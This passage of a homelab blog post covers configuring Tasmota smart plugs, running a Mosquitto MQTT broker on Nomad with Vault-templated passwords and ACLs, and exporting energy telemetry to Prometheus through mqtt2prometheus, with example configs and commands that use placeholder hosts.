<p>The advantage of using Tasmota is that it is an Open Source firmware that
requires some configuration for different devices - but not individual rebuilds.
It&rsquo;s also independent of the vendor, which means I don&rsquo;t have to care at all
whether the manufacturer continues to support the plugs or not. They also have
an industry-standard SoC, the <em>ESP8266</em>.</p>
<p>So in short: No cloud required! (Well, besides your own internal cloud,
depending on the size of your Homelab. &#x1f609;)</p>
<p>They are WiFi connected, which makes deployment a bit easier, with no new networking
equipment for e.g. Zigbee needed.</p>
<p>When first starting a fresh plug, or after resetting it, Tasmota starts the
WiFi chip in AP mode, so you can connect with your phone or another WiFi device.
Then it shows a website for configuring the WiFi the plug should be connecting
to.</p>
<p>After that, the plug&rsquo;s MQTT settings also need to be
configured. But first we need to set up an MQTT broker - and explain what MQTT even
is.</p>
<p>Finally, a modest amount of security. Tasmota supports Basic Auth, which I
have set up to secure the Web UI. Go to &ldquo;Configuration&rdquo; -&gt; &ldquo;Configure Other&rdquo;
and enter a password under &ldquo;Web Admin Password&rdquo;.</p>
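<p>Incidentally, most of this - including the MQTT settings configured later - can
also be done through Tasmota&rsquo;s console instead of clicking through the web UI. A
rough sketch with placeholder values, entered one command per line in the console:</p>
<pre tabindex="0"><code>WebPassword your-admin-password
MqttHost mqtt.example.com
MqttUser plug1
MqttPassword your-mqtt-password
Topic plug1
TelePeriod 60
</code></pre>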
<h2 id="mqtt">MQTT</h2>
<p>Not having worked with MQTT ever before, I found <a href="https://www.hivemq.com/blog/mqtt-essentials-part-1-introducing-mqtt/">this series</a>
on it a pretty good introduction.</p>
<p>In principle, MQTT (Message Queuing Telemetry Transport) is a lightweight protocol for
transmitting telemetry data, like metrics. It is kept deliberately simple, so that it can be
implemented easily on the low-power chips of IoT devices.</p>
<p>MQTT is a pub/sub system. You&rsquo;ve got a central broker. Clients can then connect
to that broker and subscribe to topics, like &ldquo;power_plugs/living_room/plug3&rdquo;, or
to a wildcard like &ldquo;power_plugs/#&rdquo; to receive all events other devices push below that topic. In
my setup, the Tasmota power plugs push to topics called <em>plugs/tasmota/tele</em>.</p>
<p>MQTT payloads can be arbitrary data, but Tasmota pushes its messages in JSON format. A message from the
plugs looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;Time&#34;</span>: <span style="color:#e6db74">&#34;2023-06-08T22:01:44&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;ENERGY&#34;</span>: {
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;TotalStartTime&#34;</span>: <span style="color:#e6db74">&#34;2023-02-01T21:57:12&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Total&#34;</span>: <span style="color:#ae81ff">405.918</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Yesterday&#34;</span>: <span style="color:#ae81ff">3.481</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Today&#34;</span>: <span style="color:#ae81ff">3.19</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Period&#34;</span>: <span style="color:#ae81ff">12</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Power&#34;</span>: <span style="color:#ae81ff">150</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ApparentPower&#34;</span>: <span style="color:#ae81ff">214</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ReactivePower&#34;</span>: <span style="color:#ae81ff">153</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Factor&#34;</span>: <span style="color:#ae81ff">0.7</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Voltage&#34;</span>: <span style="color:#ae81ff">233</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Current&#34;</span>: <span style="color:#ae81ff">0.918</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>This is a message from my Homelab plug. The lab currently draws around 150 W,
at my local ~230 V, and today I had already used 3.19 kWh.</p>
<p>An MQTT broker can be observed with several tools, which can subscribe to all
or a subset of messages. I&rsquo;ve found <a href="https://mqtt-explorer.com/">MQTT Explorer</a>
to work well for manual monitoring.</p>
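<p>The command line clients shipped with Mosquitto also work fine for a quick look.
A small sketch, with placeholder host and credentials:</p>
<pre tabindex="0"><code># dump all telemetry the plugs publish, with the topic prepended (-v)
mosquitto_sub -h mqtt.example.com -p 1883 \
  -u plug-user -P your-mqtt-password \
  -t 'plugs/tasmota/tele/#' -v
</code></pre>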
<p>The plugs are also subscribed to specific topics. By publishing certain messages
to those topics, the plugs can for example be switched on and off. As I
mentioned above, I&rsquo;m not doing any automation, only energy consumption
measurement, so I&rsquo;m not using that feature at the moment.</p>
<p>From a security standpoint, MQTT supports user credentials and running over TLS.
More on those topics when I go over the Mosquitto setup.</p>
<h2 id="setting-up-the-mqtt-broker">Setting up the MQTT broker</h2>
<p>I&rsquo;m using <a href="https://mosquitto.org/">Mosquitto</a> as my MQTT broker. Main reason:
It&rsquo;s open source, and it was mentioned by a lot of the other IoT open source
tools I&rsquo;ve been using.</p>
<p>It has an official Docker container <a href="https://hub.docker.com/_/eclipse-mosquitto">here</a>.
As always, I&rsquo;m deploying it in my Nomad cluster, with the following job config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">job</span> <span style="color:#e6db74">&#34;mosquitto&#34;</span> {
</span></span><span style="display:flex;"><span>  datacenters <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;homenet&#34;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  priority <span style="color:#f92672">=</span> <span style="color:#ae81ff">50</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">constraint</span> {
</span></span><span style="display:flex;"><span>    attribute <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${node.class}&#34;</span>
</span></span><span style="display:flex;"><span>    value     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;internal&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">group</span> <span style="color:#e6db74">&#34;mosquitto&#34;</span> {
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">network</span> {
</span></span><span style="display:flex;"><span>      mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bridge&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">port</span> <span style="color:#e6db74">&#34;mqtt&#34;</span> {}
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">service</span> {
</span></span><span style="display:flex;"><span>      name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;mosquitto&#34;</span>
</span></span><span style="display:flex;"><span>      port <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;mqtt&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      tags <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>        &#34;traefik.enable<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.tcp.routers.mosquitto.entrypoints<span style="color:#f92672">=</span><span style="color:#66d9ef">mqtt</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.tcp.routers.mosquitto.rule<span style="color:#f92672">=</span><span style="color:#66d9ef">HostSNI</span>(<span style="color:#960050;background-color:#1e0010">`*`</span>)<span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.tcp.routers.mosquitto-tls.entrypoints<span style="color:#f92672">=</span><span style="color:#66d9ef">my</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">entry</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.tcp.routers.mosquitto-tls.rule<span style="color:#f92672">=</span><span style="color:#66d9ef">HostSNI</span>(<span style="color:#960050;background-color:#1e0010">`</span><span style="color:#66d9ef">mqtt</span>.<span style="color:#66d9ef">example</span>.<span style="color:#66d9ef">com</span><span style="color:#960050;background-color:#1e0010">`</span>)<span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.tcp.routers.mosquitto-tls.tls<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      ]
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">volume</span> <span style="color:#e6db74">&#34;vol-mosquitto&#34;</span> {
</span></span><span style="display:flex;"><span>      type            <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;csi&#34;</span>
</span></span><span style="display:flex;"><span>      source          <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vol-mosquitto&#34;</span>
</span></span><span style="display:flex;"><span>      attachment_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;file-system&#34;</span>
</span></span><span style="display:flex;"><span>      access_mode     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;single-node-writer&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">task</span> <span style="color:#e6db74">&#34;mosquitto&#34;</span> {
</span></span><span style="display:flex;"><span>      driver <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;docker&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">config</span> {
</span></span><span style="display:flex;"><span>        image <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;eclipse-mosquitto:2.0.15&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">mount</span> {
</span></span><span style="display:flex;"><span>          type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bind&#34;</span>
</span></span><span style="display:flex;"><span>          source <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local/conf/&#34;</span>
</span></span><span style="display:flex;"><span>          target <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/mosquitto/config&#34;</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">volume_mount</span> {
</span></span><span style="display:flex;"><span>        volume      <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vol-mosquitto&#34;</span>
</span></span><span style="display:flex;"><span>        destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/mosquitto/data&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">vault</span> {
</span></span><span style="display:flex;"><span>        policies <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;mosquitto&#34;</span>]
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">dynamic</span> <span style="color:#e6db74">&#34;template&#34;</span> {
</span></span><span style="display:flex;"><span>        for_each <span style="color:#f92672">=</span> <span style="color:#66d9ef">fileset</span>(<span style="color:#e6db74">&#34;.&#34;, &#34;mosquitto/conf/*&#34;</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">content</span> {
</span></span><span style="display:flex;"><span>          data <span style="color:#f92672">=</span> <span style="color:#66d9ef">file</span>(<span style="color:#66d9ef">template</span>.<span style="color:#66d9ef">value</span>)
</span></span><span style="display:flex;"><span>          destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local/conf/${basename(template.value)}&#34;</span>
</span></span><span style="display:flex;"><span>          perms <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;600&#34;</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">template</span> {
</span></span><span style="display:flex;"><span>        data <span style="color:#f92672">=</span> <span style="color:#66d9ef">file</span>(<span style="color:#e6db74">&#34;mosquitto/templates/passwd&#34;</span>)
</span></span><span style="display:flex;"><span>        destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;secrets/passwd&#34;</span>
</span></span><span style="display:flex;"><span>        change_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;restart&#34;</span>
</span></span><span style="display:flex;"><span>        perms <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;600&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">template</span> {
</span></span><span style="display:flex;"><span>        data <span style="color:#f92672">=</span> <span style="color:#66d9ef">file</span>(<span style="color:#e6db74">&#34;mosquitto/templates/mosquitto.conf&#34;</span>)
</span></span><span style="display:flex;"><span>        destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local/conf/mosquitto.conf&#34;</span>
</span></span><span style="display:flex;"><span>        change_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;restart&#34;</span>
</span></span><span style="display:flex;"><span>        perms <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;600&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">resources</span> {
</span></span><span style="display:flex;"><span>        cpu <span style="color:#f92672">=</span> <span style="color:#ae81ff">100</span>
</span></span><span style="display:flex;"><span>        memory <span style="color:#f92672">=</span> <span style="color:#ae81ff">50</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>I&rsquo;ve cut a couple of tasks out of the above config, as they pertain to the
Prometheus exporters for the MQTT data. I will go into detail about them later.</p>
<p>As I always do, I&rsquo;m putting the service into a bridge network.</p>
<p>But in contrast
to my normal usage of Consul Connect networking to connect services, I&rsquo;m using
an exposed port, <code>mqtt</code>, here. The reason for this is that MQTT is a pure TLS/TCP
protocol, and those don&rsquo;t currently work together with Traefik as the ingress
proxy. While HTTPS is properly terminated in Traefik and then re-encrypted with
the Consul Connect certs for the downstream connection, this currently does not
work right for pure TLS connections. There&rsquo;s a <a href="https://github.com/traefik/traefik/pull/9465">Traefik bug</a>, where a proxied pure TLS/TCP connection is
not properly re-encrypted with the Consul Connect certs. As a consequence, the
Consul connect network never forwards those packets properly. It looks like the
bug in Traefik has been fixed, but it has not been released yet.</p>
<p>So for now, my Mosquitto job&rsquo;s service is just that, a service, without Consul
Connect integration. It&rsquo;s the one port that&rsquo;s just dangling openly in my network.
I really hope that Traefik fix gets released sometime soon.</p>
<p>I&rsquo;m still proxying all Mosquitto traffic through Traefik, though. This is
mostly due to my firewall. As all traffic is blocked by default for the IoT
VLAN, I need to open a port in the firewall to let the MQTT traffic into the
Homelab. But I don&rsquo;t really want all of my Homelab cluster hosts to be
accessible from the IoT VLAN. So instead, I have got one ingress host, running
Traefik, which then proxies to all my services. This ingress host is fixed, to
allow me to set up proper ingress rules. By then proxying everything through
Traefik, I only need this one ingress host, and I only need to pin Traefik to
it, while everything else can still be deployed however Nomad likes.
(This is not my externally accessible bastion host - that one isn&rsquo;t part of the
Nomad cluster.)</p>
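<p>Just to sketch how such a plain TCP route through Traefik can be declared, here is
the kind of tag set that would go onto the Nomad service. The entrypoint and router
names are made up for illustration, this is not my exact service definition:</p>
<pre tabindex="0"><code>service {
  name = "mosquitto"
  port = "mqtt"

  tags = [
    "traefik.enable=true",
    # TCP router on a dedicated 'mqtt' entrypoint. HostSNI(`*`) matches any
    # connection, which is what a plain TCP/TLS passthrough needs.
    "traefik.tcp.routers.mqtt.entrypoints=mqtt",
    "traefik.tcp.routers.mqtt.rule=HostSNI(`*`)",
  ]
}
</code></pre>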
<p>Besides the above, the only noteworthy thing to point out is the fact that
Mosquitto needs some local storage to work with.</p>
<p>Mosquitto&rsquo;s config itself is a little bit more involved. First, the main
config file:</p>
<pre tabindex="0"><code>listener 1883
socket_domain ipv4
allow_anonymous false
password_file /secrets/passwd
acl_file /mosquitto/config/acl.conf
connection_messages true
log_dest stdout
log_type all
persistence true
persistence_location /mosquitto/data
persistent_client_expiration 4w
</code></pre><p>This configures a listener on the standard MQTT port <code>1883</code>, disallows
any anonymous access and, importantly, configures ACLs and passwords.</p>
<p>Let&rsquo;s start with the passwords. The password file, in my case, looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-go" data-lang="go"><span style="display:flex;"><span>{{ <span style="color:#66d9ef">range</span> <span style="color:#a6e22e">secrets</span> <span style="color:#e6db74">&#34;my_secrets/my_services/mosquitto/users/&#34;</span> }}
</span></span><span style="display:flex;"><span>{{ <span style="color:#960050;background-color:#1e0010">$</span><span style="color:#a6e22e">username</span> <span style="color:#f92672">:=</span> . }}
</span></span><span style="display:flex;"><span>{{ <span style="color:#a6e22e">with</span> <span style="color:#a6e22e">secret</span> (<span style="color:#a6e22e">printf</span> <span style="color:#e6db74">&#34;my_secrets/my_services/mosquitto/users/%s&#34;</span> .) }}{{ <span style="color:#66d9ef">range</span> <span style="color:#960050;background-color:#1e0010">$</span><span style="color:#a6e22e">k</span>, <span style="color:#960050;background-color:#1e0010">$</span><span style="color:#a6e22e">v</span> <span style="color:#f92672">:=</span> .<span style="color:#a6e22e">Data</span> }}
</span></span><span style="display:flex;"><span>{{ <span style="color:#960050;background-color:#1e0010">$</span><span style="color:#a6e22e">username</span> }}:{{ <span style="color:#960050;background-color:#1e0010">$</span><span style="color:#a6e22e">v</span> }}
</span></span><span style="display:flex;"><span>{{ <span style="color:#a6e22e">end</span> }}{{ <span style="color:#a6e22e">end</span> }}{{ <span style="color:#a6e22e">end</span> }}
</span></span></code></pre></div><p>This is obviously not Mosquitto&rsquo;s standard passwd format. Instead, it&rsquo;s a
<code>consul-template</code> template. It goes over all usernames in my Vault secrets store
for Mosquitto and lists them together with the passwords. This way, I don&rsquo;t need
to check the passwords into my Homelab repo.</p>
<p>The deployed file looks something like this:</p>
<pre tabindex="0"><code>user1:$7$PASSWORD_GIBBERISH_HERE==

user2:$7$DIFFERENT_PASSWORD_GIBBERISH_HERE==
</code></pre><p>The password file&rsquo;s entries can be created with Mosquitto&rsquo;s own <a href="https://mosquitto.org/man/mosquitto_passwd-1.html">mosquitto_passwd</a>
tool. This also works well when launching the tool via the Mosquitto Docker
container.</p>
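<p>Just as an illustration, creating such entries through the container image from the
job above could look roughly like this. The mounted path, usernames and passwords are
placeholders:</p>
<pre tabindex="0"><code># Create a fresh password file with one user. -c creates (and overwrites) the
# file, -b takes the password directly on the command line.
docker run --rm -v "$PWD:/work" eclipse-mosquitto:2.0.15 \
  mosquitto_passwd -c -b /work/passwd user1 'some-password'

# Add a second user to the existing file (no -c this time).
docker run --rm -v "$PWD:/work" eclipse-mosquitto:2.0.15 \
  mosquitto_passwd -b /work/passwd user2 'another-password'
</code></pre>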
<p>Finally, I&rsquo;ve also configured some ACLs to make sure that even if some IoT
device gets hacked, it can&rsquo;t do too much. The ACL file looks like this:</p>
<pre tabindex="0"><code>user plugs
topic read plugs/tasmota/cmnd/#
topic readwrite plugs/tasmota/stat/#
topic readwrite plugs/tasmota/tele/#

user metrics
topic read plugs/tasmota/tele/#
</code></pre><p>This allows my <code>plugs</code> user to only read/write under the <code>plugs/tasmota</code>
subtopics.</p>
<p>The <code>metrics</code> user then only has read access, and is used by my prometheus
exporter to read and store the data reported by the plugs for later use in
Grafana.</p>
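<p>A quick way to check that the ACLs and passwords behave as intended is to subscribe
with one of the restricted users from another machine. The hostname and credentials
below are placeholders for my real ones:</p>
<pre tabindex="0"><code># Should print the telemetry messages from all plugs.
mosquitto_sub -h mqtt.example.com -u metrics -P 'the-metrics-password' \
  -t 'plugs/tasmota/tele/#' -v

# Should stay silent: the metrics user has no read access to the cmnd topics.
mosquitto_sub -h mqtt.example.com -u metrics -P 'the-metrics-password' \
  -t 'plugs/tasmota/cmnd/#' -v
</code></pre>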
<h2 id="getting-the-data-from-mqtt-to-prometheus">Getting the data from MQTT to Prometheus</h2>
<p>Because I&rsquo;m already doing all of my metrics and monitoring via Prometheus and
Grafana, I also wanted to use Prometheus for long term storage for the data
from the power plugs. Looking around, I found <a href="https://github.com/hikhvar/mqtt2prometheus">mqtt2prometheus</a>,
which has been working pretty well.</p>
<p>I decided to deploy mqtt2prometheus in the same job and task group as Mosquitto.
My thinking was: The resource requirements are very low, and Mosquitto will be
the scraper&rsquo;s main communication partner. This way, I could just put them
all into the same task group, and hence into the same networking namespace. This
saved me from needing to configure Consul Connect for the communication.</p>
<p>The relevant parts in the Nomad job file look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">job</span> <span style="color:#e6db74">&#34;mosquitto&#34;</span> {
</span></span><span style="display:flex;"><span>  datacenters <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;homenet&#34;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  priority <span style="color:#f92672">=</span> <span style="color:#ae81ff">50</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">constraint</span> {
</span></span><span style="display:flex;"><span>    attribute <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${node.class}&#34;</span>
</span></span><span style="display:flex;"><span>    value     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;internal&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">group</span> <span style="color:#e6db74">&#34;mosquitto&#34;</span> {
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">network</span> {
</span></span><span style="display:flex;"><span>      mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bridge&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">port</span> <span style="color:#e6db74">&#34;mqtt&#34;</span> {}
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">port</span> <span style="color:#e6db74">&#34;pwr-exporter&#34;</span> {
</span></span><span style="display:flex;"><span>        static <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;9641&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }<span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">    # Service def for Mosquitto removed
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">service</span> {
</span></span><span style="display:flex;"><span>      name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;pwr-exporter&#34;</span>
</span></span><span style="display:flex;"><span>      port <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;pwr-exporter&#34;</span>
</span></span><span style="display:flex;"><span>    }<span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">    # Mosquitto Task def removed here
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">task</span> <span style="color:#e6db74">&#34;pwr-exporter&#34;</span> {
</span></span><span style="display:flex;"><span>      driver <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;docker&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">config</span> {
</span></span><span style="display:flex;"><span>        image <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ghcr.io/hikhvar/mqtt2prometheus:v0.1.7&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        args <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>          <span style="color:#e6db74">&#34;-config&#34;, &#34;/secrets/config.yaml&#34;</span>,
</span></span><span style="display:flex;"><span>          <span style="color:#e6db74">&#34;-listen-port&#34;, &#34;${NOMAD_PORT_pwr_exporter}&#34;</span>,
</span></span><span style="display:flex;"><span>          <span style="color:#e6db74">&#34;-log-format&#34;, &#34;json&#34;</span>,
</span></span><span style="display:flex;"><span>        ]
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">vault</span> {
</span></span><span style="display:flex;"><span>        policies <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;mosquitto&#34;</span>]
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">template</span> {
</span></span><span style="display:flex;"><span>        data <span style="color:#f92672">=</span> <span style="color:#66d9ef">file</span>(<span style="color:#e6db74">&#34;mosquitto/templates/pwr-exporter.yaml&#34;</span>)
</span></span><span style="display:flex;"><span>        destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;secrets/config.yaml&#34;</span>
</span></span><span style="display:flex;"><span>        change_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;restart&#34;</span>
</span></span><span style="display:flex;"><span>        perms <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;600&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">resources</span> {
</span></span><span style="display:flex;"><span>        cpu <span style="color:#f92672">=</span> <span style="color:#ae81ff">50</span>
</span></span><span style="display:flex;"><span>        memory <span style="color:#f92672">=</span> <span style="color:#ae81ff">50</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>I removed the Mosquitto specific parts of the job file above. See the job file
in the Mosquitto section to see the Mosquitto task&rsquo;s config.</p>
<p>First, the exporter is bound to a static port, &ldquo;9641&rdquo;. This is necessary because
we need to provide a fixed host:port scrape target in Prometheus&rsquo; config.
(I&rsquo;ve still got a task in my backlog to look into Prometheus&rsquo; support for
scrape target discovery via Consul).</p>
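<p>For completeness, a Consul-based discovery config for this exporter would probably
look something like the following sketch, using the <code>pwr-exporter</code> service
registered in the job above. I haven&rsquo;t actually deployed this yet, so take it with
a grain of salt:</p>
<pre tabindex="0"><code>  - job_name: mqtt-exporters-consul
    consul_sd_configs:
      - server: "consul.example.com:8500"
        services: ["pwr-exporter"]
    relabel_configs:
      # Keep the Consul service name around as a label on the scraped metrics.
      - source_labels: [__meta_consul_service]
        target_label: consul_service
</code></pre>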
<p>The <code>pwr-exporter.yaml</code> file looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">mqtt</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">server</span>: <span style="color:#ae81ff">tcp://mqtt.example.com:1883</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">user</span>: <span style="color:#ae81ff">promexport</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">password</span>: <span style="color:#e6db74">&#39;{{ with secret &#34;my_secrets/my_services/mosquitto/users/exporter-clear&#34; }}{{ .Data.secret }}{{end}}&#39;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">client_id</span>: <span style="color:#ae81ff">my-exporters-pwr</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">topic_path</span>: <span style="color:#e6db74">&#34;plugs/tasmota/tele/#&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">device_id_regex</span>: <span style="color:#e6db74">&#34;plugs/tasmota/tele/(?P&lt;deviceid&gt;.*)/.*&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metrics</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">prom_name</span>: <span style="color:#ae81ff">mqtt_total_power_kwh</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mqtt_name</span>: <span style="color:#ae81ff">ENERGY.Total</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">help</span>: <span style="color:#e6db74">&#34;Total power consumption (kWh)&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#ae81ff">counter</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">prom_name</span>: <span style="color:#ae81ff">mqtt_power</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mqtt_name</span>: <span style="color:#ae81ff">ENERGY.Power</span>
